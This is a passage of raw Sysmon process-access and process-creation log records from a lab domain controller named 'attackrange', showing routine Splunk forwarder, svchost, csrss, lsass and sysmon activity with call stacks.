Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.955{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6D00-00000000AE01}3864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.955{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6D00-00000000AE01}3864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.958{266CAFBE-6482-6064-6D00-00000000AE01}3864C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.846{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6C00-00000000AE01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.846{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6C00-00000000AE01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.846{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6C00-00000000AE01}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.849{266CAFBE-6482-6064-6C00-00000000AE01}4036C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.752{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.752{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6A00-00000000AE01}2504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6800-00000000AE01}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 